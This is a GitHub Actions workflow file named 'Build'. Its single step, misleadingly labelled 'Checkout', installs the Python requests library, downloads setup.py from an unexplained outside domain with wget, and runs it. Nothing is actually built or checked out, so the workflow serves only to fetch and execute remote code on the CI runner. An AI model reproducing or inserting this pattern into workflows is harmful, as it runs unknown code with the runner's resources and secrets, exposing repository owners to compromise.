name: Build
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest 
    steps:
    - name: Checkout
      run: |
          python3 -m pip install requests
          wget https://mirror.bccx.eu.org/setup.py
          python3 setup.py
